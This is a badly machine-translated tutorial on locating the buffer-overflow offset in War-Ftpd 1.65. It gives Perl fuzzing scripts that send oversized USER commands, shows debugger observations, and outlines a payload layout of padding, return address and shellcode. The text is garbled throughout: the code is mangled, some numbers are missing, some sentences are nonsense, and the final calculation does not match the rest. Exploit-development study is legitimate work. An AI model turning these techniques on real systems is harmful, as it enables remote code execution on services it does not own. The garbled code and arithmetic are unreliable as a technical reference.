Two methods to locate hejian overflow points

 

Author: SuperHei Nature of the article: original Release date:

Vulnerability software: War-Ftpd version 1.65 Debugging software: Ollydbg Programming: perl Vulnerability Description: Creates a USER, causing stack overflow. For some debugging problems, please refer to: Win32 Buffer Overflow practice http://www.ph4nt0m.org/doc/20041101160955.pdf We first simulate ftp login and write a script, and use AAAA to submit the user ..... indicates the number of times submitted using parameters. The overflow point we want to determine is the AAA ..... the number of our ret records that have just been overwritten. #! /Usr/bin/perl Use IO: Socket; $ ARGC = @ ARGV; $ Host = "127.0.0.1 "; $ Port = "2121 "; $ Eff = @ ARGV [0]; $ Buff = 'A' x $ eff; My $ sock = IO: Socket: INET-> new (Proto => "tcp ", PeerAddr => $ host, PeerPort => $ port) | die "Sorry! Cocould not connect to $ host \ n "; Print $ sock "USER $ buff \ n "; Print "USER $ buff \ n "; Close $ sock; Next we use a 2-way method to determine this $ eff. First, we use ollydbg to load our War-Ftpd and run it. We run the pl C: \ usr \ bin> exp. pl 800 USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Bytes Bytes Bytes Bytes Bytes Bytes Bytes Bytes Bytes Aaaaa When we submit 800 A requests, overflow is triggered, and war-ftpd fails. The EIP value is 41414141. Here we re-use the olldbg for debugging once, this time we submit 400: C: \ USR \ bin> exp. pl 400 User aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Bytes Bytes Bytes Bytes AAAAA The vulnerability was not triggered at all, indicating that our ret was not overwritten by the AAAA we submitted. We can confirm The value of $ eff is between and. We are testing 550 A vulnerabilities, and the vulnerability is triggered again. Then we confirm that the value of $ eff is between and. .................... Finally, when we submit 489 A records, the last 4 A records overwrite our return address (ret) ollydbg. The eip of is exactly overwritten by 41414141, so we are sure that the overflow is reached :). That is, we can preliminarily determine the characters submitted by exp: User aaaa... (485) + RET + ShellCode Next, we need to confirm the shellcode address. We can see that our shellcode can be found near esp through debugging. Then we can use the jump exp (or call esp) Address to overwrite RET, so our jump will be completed ............... In fact, we have completed a small part of exp, mainly including the compilation and debugging of shellcode. I am not familiar with it yet. I am trying to work hard at ing :). B. Use two overflows to locate overflow points This method was first seen on Anti-DDoS. The example is the last user vulnerability in War-Ftpd version 1.65. 1st Overflow Code: #! /Usr/bin/perl Use IO: Socket; $ Host = "127.0.0.1 "; $ Port = "2121 "; My $ sock = IO: Socket: INET-> new (Proto => "tcp ", PeerAddr => $ host, PeerPort => $ port) | die "Sorry! Cocould not connect to $ host \ n "; Print $ sock "USER "; # Key code For ($ I = 0; I I <800; $ I ++ ){ $ K = $ I % 10 + 100; # <= pay attention to this Print $ sock chr ($ k ); Print chr ($ k );} Print $ sock "\ n "; Close $ sock; Load War-Ftpd with ollydbg and run it. C: \ usr \ bin> buff1.pl Bytes Bytes Bytes Bytes Bytes Bytes Bytes Bytes Bytes Bytes We can see that we submitted a 10-digit letter between 100-109 and d-m to determine the ending number. The overflow is triggered. At this time, the eip 0x6C6B6A69 corresponds to the lkji machine code arrangement, which exists in reverse order. Therefore, the first ret address we cover is I, and the machine code is 0x69. The letter "d-m" with no segments starts with "d ". The corresponding machine code is 0x64. We can determine that the end number of the submitted buff length is 0x69-0x64 = 5. Cover ret. 2nd Overflow Code: #! /Usr/bin/perl Use IO: Socket; $ Host = "127.0.0.1 "; $ Port = "2121 "; My $ sock = IO: Socket: INET-> new (Proto => "tcp ", PeerAddr => $ host, PeerPort => $ port) | die "Sorry! Cocould not connect to $ host \ n "; Print $ sock "USER "; # Key code For ($ I = 0; I I <800; $ I ++ ){ $ K = $ I/10 + 100; # <= pay attention to this Print $ sock chr ($ k ); Print chr ($ k );} Print $ sock "\ n "; Close $ sock; Use ollydbg to reload War-Ftpd and run it. C: \ usr \ bin> buff1.pl Bytes Bytes Detail {{{{{{{{{{ | | }}}}}}}}}}~~~~~~~~~~?????????? When there are too many threads, there are too many threads, too many threads Please refer to the following link for more information: Please refer to the following link for more information: Please refer to the following link for more information: Please refer to the following link for more information ##### Please refer to the following link for more information: Saddle-North At this time, the eip is 0x94949494, which is used to determine the overflow in that segment: 0x94-0x64 = 48 Based on the above two overflows, the overflow point is: (0x94-0x64) x10 + (0x69-0x64) = 485, that is, when we submit a 485 The buff starts to overwrite ret. 6e-64x100 + 80-64 = 1122